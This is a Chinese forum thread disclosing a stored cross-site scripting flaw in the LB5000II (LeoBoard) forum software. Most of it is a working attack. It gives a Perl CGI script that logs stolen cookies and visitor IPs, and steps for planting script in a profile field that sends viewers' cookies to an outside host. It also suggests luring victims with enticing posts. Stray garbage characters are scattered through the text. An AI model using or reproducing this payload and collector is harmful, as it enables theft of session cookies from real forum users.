雷傲跨站脚本漏洞收集用户cookie漏洞，适合与任何版本，任何系统

幸福的傻瓜

漏洞描述：
  LB5000II是国内流行的CGI程序之一，是在Ikonboard的基础之上改进的，目前最新
版本是LB5000II v20317b，可以http://www.leoboard.com下载。
  其注册模块未过滤用户资料   最高学历：职业状况：等注册信息
导致恶意用户可以通过伪造<s cript>alert(documents.ｃookie)</s cript>
' i% |' _- z& Z2 t$ X7 ]5 ~进行攻击，进一步可以通过某中方式收集。测试通过
测试程序：
1 u* c$ Q* r" v  参考漏洞描述。
解决方案：
  对用户提交的资料进行过滤
* P0 k. E/ q, h) {5 Q   

请在s8s8论坛访问
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
那么你在s8s8.net 的cookie将被我所获取.
#!/usr/bin/perl
# k  l) O) a4 S% J- K9 ~: \0 `( g# h#leo.cgi
2 y8 N7 L: k3 B$ i+ J$url="http://www.s8s8.net";;
$method=$ENV{"REQUEST_METHOD"};
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
$remote_addr=$ENV{"REMOTE_ADDR"};
2 I- Q/ @& M( E; w( t1 X8 T$ f9 H$buffer=~tr/+/ /;
+ e7 M$ }3 [0 `8 K& q5 E$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg;
% c7 z) P  B6 c' \3 V* A; p$buffer=$buffer."|$remote_addr\n";
open(FILE,">>leo.txt");
% q' ~1 c; M" cprint FILE $buffer;
4 D6 K/ l8 b/ {) P, Gclose(FILE);                       
: x* T1 j- Z, S+ \* P; qprint "Location:$url\n\n";
上面是我的cookie收集脚本
------------------------------------------------------------------------------
- x( U" k8 J; P5 J5 t  s范例：以s8s8为例，感谢好友狩猎者 shocknet 帮助测试
用大刀队登陆s8s8论坛，编辑个人资料，
用记事本打开编辑网页
<option value="中专">中专</option>  这一项改成
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.ｃookie)</s cript>">中专</option>   

编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data">
改为
* P+ f5 \) p; x7 x0 I<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
保存编辑的网页，用自己的页登陆，选“中专”一项，提交数据，
3 [% n& [( a0 n; V这样以后只要查看大刀队的资料的用户，那么查看者的cookie资料将被截获。
( o! }' T: c' k3 l; e3 m为了伪装的更好，可以在论坛发具有诱惑力的帖子连接，吸引人家去点击，
什么算诱惑力呢，自己发挥吧。

lostway

我连怎么设置超连接都不懂~~~汗~！能教教我吗？
( e! \8 M2 c. ]) p3 m（我指在贴上设置）

YES东

我们的论坛虽然是使用这个程序！但没这个问题！

幸福的傻瓜

那当染好了啊